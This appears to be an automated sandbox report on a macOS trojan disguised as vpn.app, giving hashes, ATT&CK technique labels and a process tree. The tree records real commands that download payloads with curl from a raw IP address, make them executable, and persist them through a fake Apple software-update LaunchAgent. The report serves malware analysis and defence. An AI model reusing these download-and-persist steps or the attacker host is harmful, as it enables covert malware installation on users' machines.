Resubmissions
07-11-2024 18:36
241107-w9c14sxcjh 10Analysis
-
max time kernel
77s -
max time network
147s -
platform
macos-10.15_amd64 -
resource
macos-20241106-en -
resource tags
-
submitted
07-11-2024 18:36
General
-
Target
vpn.app/Contents/MacOS/vpn
-
Size
106KB
-
MD5
6d6ee4e9054cd7886902cf5a4ed215fd
-
SHA1
b486104d58bd9e267ab761bfdaa7955942bebcb8
-
SHA256
6f551940380e2a4d4db3c9b25e85ef9d3c7628dbb60994b0ec066024cd355d45
-
SHA512
972a26cd02f96fccd71151cac3fa51afc1c72d89f51886b01e19022f978e6322cda601eb68085b2a35d1a8d600f7b225f65f5e37ef5b340c7ab3baf0d7eac888
-
SSDEEP
1536:EI3I09nvBbpIBBRVOAUOaT1CYjLxdC1hngLLFTAI+uIMRDdcC:El0FvB6BRVGOteHC1hngLLFsI+LMRL
Malware Config
Signatures
-
Exfiltration Over Alternative Protocol 1 TTPs 2 IoCs
Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.
-
Launch Agent 1 TTPs
Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence.
-
Resource Forking 1 TTPs 1 IoCs
Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.
-
Launchctl 1 TTPs 2 IoCs
Adversaries may abuse launchctl to execute commands or programs. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.
Processes
-
/bin/shsh -c "sudo /bin/zsh -c \"/Users/run/vpn.app/Contents/MacOS/vpn\""1⤵
-
/bin/bashsh -c "sudo /bin/zsh -c \"/Users/run/vpn.app/Contents/MacOS/vpn\""1⤵
-
/usr/bin/sudosudo /bin/zsh -c /Users/run/vpn.app/Contents/MacOS/vpn1⤵
-
/bin/zsh/bin/zsh -c /Users/run/vpn.app/Contents/MacOS/vpn2⤵
-
-
/Users/run/vpn.app/Contents/MacOS/vpn/Users/run/vpn.app/Contents/MacOS/vpn2⤵
-
-
/bin/bash/bin/bash /Users/run/vpn.app/Contents/Resources/script1⤵
-
/usr/bin/unameuname -m2⤵
-
-
/bin/mkdirmkdir /Users/run/.androids2⤵
-
-
/usr/bin/curlcurl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated2⤵
-
-
/bin/chmodchmod a+x /Users/run/.androids/softwareupdated2⤵
-
-
/bin/chmodchmod 644 /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist2⤵
-
-
/bin/launchctllaunchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist2⤵
-
-
/bin/launchctllaunchctl start softwareupdated2⤵
-
-
/Users/run/.androids/softwareupdated/Users/run/.androids/softwareupdated2⤵
-
-
/usr/bin/chflagschflags uchg /Users/run/.androids/softwareupdated2⤵
-
-
/usr/bin/curlcurl -L http://46.137.201.254/covid -o /Users/run/covid2⤵
-
-
/usr/libexec/xpcproxyxpcproxy com.apple.nsurlstoraged1⤵
-
/usr/libexec/nsurlstoraged/usr/libexec/nsurlstoraged --privileged1⤵
-
/usr/libexec/xpcproxyxpcproxy softwareupdated1⤵
-
/Users/run/.androids/softwareupdated/Users/run/.androids/softwareupdated -D1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
54KB
MD564f469698e53d0c828b7f90acd306082
SHA1bcc041b3849e1b0b4104ffeb46002207eeac54f3
SHA256d74d0e429343f5e1b3e0b9437e048917c4343a30cff068739ea898bad8e37ffd
SHA512a8334d1304f2fbd32cfd0ca35c289a45c450746cf3be57170cbbe87b723b1910c2e950a73c1fb82de9dc5ed623166d339a05fec3d78b861a9254dc2cb51fab5f